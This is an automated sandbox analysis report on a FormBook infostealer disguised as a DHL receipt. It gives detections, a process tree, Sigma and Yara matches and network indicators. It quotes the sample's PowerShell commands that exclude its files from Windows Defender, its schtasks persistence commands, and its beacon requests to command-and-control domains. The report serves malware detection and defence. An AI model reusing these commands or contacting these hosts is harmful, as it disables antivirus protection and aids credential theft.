Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Sample name:DHL AWB Receipt_pdf.bat.exe
Analysis ID:1629832
MD5:c954a4b03c33a981a0c82533f4a9e917
SHA1:a8a3dabbc07ca6b2213167ee3b95f132b98b3b58
SHA256:6531397d4b6e69128ea61f5e607f7be5c1fe0564a3676268e086e51e2806de9d
Tags:batDHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DHL AWB Receipt_pdf.bat.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C954A4B03C33A981A0C82533F4A9E917)
    • powershell.exe (PID: 3060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7180 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • CLaoxM16clnn.exe (PID: 3612 cmdline: "C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\P4d0Bp9O.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • EhStorAuthn.exe (PID: 7924 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • CLaoxM16clnn.exe (PID: 5232 cmdline: "C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\lKia7vJCslSoN.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 8136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • AYBPplggzXaXav.exe (PID: 7396 cmdline: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe MD5: C954A4B03C33A981A0C82533F4A9E917)
    • schtasks.exe (PID: 7760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 3060, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 3060, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe, ParentImage: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe, ParentProcessId: 7396, ParentProcessName: AYBPplggzXaXav.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp", ProcessId: 7760, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", ProcessId: 7180, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 3060, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", ProcessId: 7180, ProcessName: schtasks.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeReversingLabs: Detection: 42%
                Multi AV Scanner detection for submitted file
                Source: DHL AWB Receipt_pdf.bat.exeVirustotal: Detection: 54%Perma Link
                Source: DHL AWB Receipt_pdf.bat.exeReversingLabs: Detection: 42%
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: JifX.pdb source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: JifX.pdbSHA256c source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CLaoxM16clnn.exe, 00000012.00000000.1922490796.000000000064F000.00000002.00000001.01000000.0000000D.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2066595706.000000000064F000.00000002.00000001.01000000.0000000D.sdmp

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.031233435.xyz
                Source: DNS query: www.publicblockchain.xyz
                Source: DNS query: www.multo.xyz
                Source: DNS query: www.usastakes.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 23.29.115.2 23.29.115.2
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /wuv4/?NX1=2OIhpue752EZ90/Jy4OxJmXTvJVBgAPVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCTNG9mwD0i4+P4pyvszZmf8O6naOAWouwNw4=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.loonerverse.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /esw3/?NX1=STIHOi9CYFClakjUlEd88Hg71sRPIlHg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjRWN3JEsIIp4+Lk93ivaQ3wRGKSmERjLyylY=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.primepath.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /frae/?NX1=KcpF0TU1XcHay6iKIgUxHwJBag7K5Rp8isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kks1mZN5Rw1IHph1hFA1oAtKX7qbyGh9Efm8A=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.031233435.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /19my/?NX1=joqcG+fZarPVQJ7TjIZXuruwpJYmUIAtjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwdPne9PHFThd6AUssI6eq1RRxJddXIyJW2Mw=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.quo1ybjmkhdqljoz.topUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /lp5v/?NX1=7yIrJbTkKXcZ3P0Lbb/spbunlPs5ol0HVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2HkhnrZp1ClYlXmvo9VRgUmZgBahPRESa7mQ=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.publicblockchain.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /piuf/?NX1=YCNZp8d5iXit/W0B1bW8XejC8zl3xaJp36jPY/C6OJXNmYBtndpnLj0XSaiYBStqm/SDNtVWLS5HnYm1prURs2IOPUK2dXL3xdhHfQhvmtooQIjipHkpPlE=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.multo.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ty1w/?dVC=cRpHHbL8w&NX1=DmU+BbsPdbeZ2otgmuqzGLQugMuTtu9/22nZgrH0plfMc3nD0zI48kMWd79FMLpDsXRjkkg28/qOhccmO28DIBTEdHWXn0U/2uWCjCXjHjQfGNNmXy/2oB8= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tkloqr.infoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /acnz/?NX1=4AOqIRL3pTX0nNGjjVOpTiKt19HhLJBNgOr/RdoxqxyE7WxJ0cGBT5xqcnG7h+9L/Gcmqaxm6woK1RcVOdtmnyI0/drZ3hMyaL9fBH0Z6Xy5J/X6Z9f5Zvc=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.streaay.liveUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qnz1/?dVC=cRpHHbL8w&NX1=R+Oteo3rh3f7nhB39ii3M5Z93IdAkzgqallxSves6Vu4hZ6h0oWNPYtUeAXf+7K/BC0XOkjfNAq1UFaiNKAvWuZ5F0pebRTMAKK48iU+Sr/MG8LNpjaOKCc= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.77zhibo.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /bio5/?NX1=7nMcQ+p/VAEQ2azR1rftKXgvVAA48fsnkTeWIV8mecaktUDEYNaH1yi6Gw2pgnszfL4ShPP5kx9f65xk5DOH4uGIRvQaV8QFqEOJGGvXq7C1+/v4pj4qJdc=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.thefounder.ceoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2dxw/?NX1=53Ecfr8B68ed/BlhjMNZMhOAyCUiFgtXzowAhVF0Im0gjpOoyg3aVrzjUCT/Cf1+dwJRkAgo8V3FznBqNeiDxdw1mEZBLSWyb+kzDCV7nDGH4eKPYFUfhXQ=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rbopisalive.cyouUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /j7xf/?NX1=EoO1UT5Wd2PGx3Mw+6+CyE09Q8dDTjZjjQBsBAQWNKytFXrnqux0YvA75VbZy52yQ1EBW1TgMDX5nQfvFmbNK4hUQQvIOcKyXaxp8NHr2eSXhQvy/sW4Iq4=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.spacewalker.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5o3b/?NX1=aMDQ2zlSfVAnRg1NG0Nyyzi6AeOTYb1wQ1hE+7gf/URoUExZouIubEid9yVe9hJJbXBuu3jvryMBZzKz5ikAUWo2jMMmhnfjZsiLKrJCzPvIjrCxjxnzadw=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ufin89.bizUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
